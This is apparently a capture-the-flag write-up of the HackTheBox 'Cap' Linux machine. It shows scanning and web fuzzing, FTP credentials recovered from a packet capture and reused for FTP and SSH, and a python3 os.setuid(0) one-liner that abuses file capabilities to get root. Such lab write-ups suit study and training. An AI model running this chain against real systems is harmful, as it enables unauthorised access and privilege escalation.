Hello Reader!! In this writeup we are going to talk about cap hackthebox machine which is linux based box.
As usual lets start our enumeration with nmap
1
2
3
4
5
6
7
8
9
10
11
12
13
──(mrgrep㉿kali)-[~/Desktop/htb/cap]
└─$ sudo nmap 10.10.10.245
[sudo] password for mrgrep:
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-03 09:57 IST
Nmap scan report for 10.10.10.245
Host is up (0.79s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 4.86 seconds
As we can clearly see here 3 ports are open so I tried FTP anonymous login check but it failed :(
Also, after opening ip in browser(as port 80 is open) got to know that User Nathan is logged in.
Now, lets try if we can find any interesting file so let’s us dirb for that.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
┌──(mrgrep㉿kali)-[~/Desktop/htb/cap]
└─$ dirb http://10.10.10.245 255 ⨯ 1 ⚙
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sat Jul 3 10:06:28 2021
URL_BASE: http://10.10.10.245/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.10.245/ ----
+ http://10.10.10.245/data (CODE:302|SIZE:208)
+ http://10.10.10.245/ip (CODE:200|SIZE:17466)
+ http://10.10.10.245/netstat (CODE:200|SIZE:28069)
From the above results we can clearly see that we have 3 files data, ip, and netstat. let’s check what’s in there.
After visiting /data we got nothing. So, decided to check /ip and here we go
We got the page which is showing some output for ipconfig command so let’s check netstat page too.
we can clearly see netstat command output. but nothing interesting here :(
Let’s use wfuzz with medium wordlist to check if we are missing anything.
1
2
┌──(mrgrep㉿kali)-[~/Desktop/htb/cap]
└─$ wfuzz -u http://10.10.10.245/data/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 --hc 302,404
after running it I got many files so I started checking one by one then I saw a file named 00 exact path was /data/00 so I decided to visit the page.
and we can see the download button so I downloaded the file and opened it in the wireshark.
After analyzing I saw lots of FTP Traffic so I Filtered traffic as FTP and here we go
We can clearly see those credentials so I logged in to the FTP with those creds.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
──(mrgrep㉿kali)-[~/Desktop/htb/cap]
└─$ ftp 10.10.10.245 127 ⨯ 2 ⚙
Connected to 10.10.10.245.
220 (vsFTPd 3.0.3)
Name (10.10.10.245:mrgrep): nathan
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-rw-r-- 1 1001 1001 13831 Jul 02 23:07 46362.py
-rw-rw-r-- 1 1001 1001 8696 Jul 03 03:26 dirty_sockv2.py
-rwxrwxrwx 1 1001 1001 342868 Jul 02 13:15 linpeas.sh
-rw-rw-r-- 1 1001 1001 342868 Jul 02 22:58 linpeas.sh.1
-rw-rw-r-- 1 1001 1001 113551 Jul 02 13:50 privesc.txt
-rwxrwxrwx 1 1001 1001 0 Jul 02 20:27 rapidscan.py
-rw-rw-r-- 1 1001 1001 69009 Jul 02 20:24 rapidscan.py.1
-rwxrwxrwx 1 1001 1001 376 Jul 02 22:05 rootend
-rw-rw-r-- 1 1001 1001 69550 Jul 02 22:00 rootend.py
drwxr-xr-x 3 1001 1001 4096 Jul 02 13:48 snap
-rw-rw-r-- 1 1001 1001 170 Jul 02 14:02 test.service
-r-------- 1 1001 1001 33 Jul 02 13:25 user.txt
-rw-rw-r-- 1 1001 1001 32804 Apr 08 17:22 windapsearch.py
226 Directory send OK.
if you notice we got our user.txt flag.
Also for ssh credentials are same so after logging into ssh I ran linpeas script and got the following interested output.
we can clearly see the capabilities issue and machine name also suggest the same :D
SO to confirm let’s check
1
2
nathan@cap:~$ python3 -c 'import os; os.setuid(0); os.system("whoami")'
root
and here we go….
Thank you for reading, Have a great time ahead!!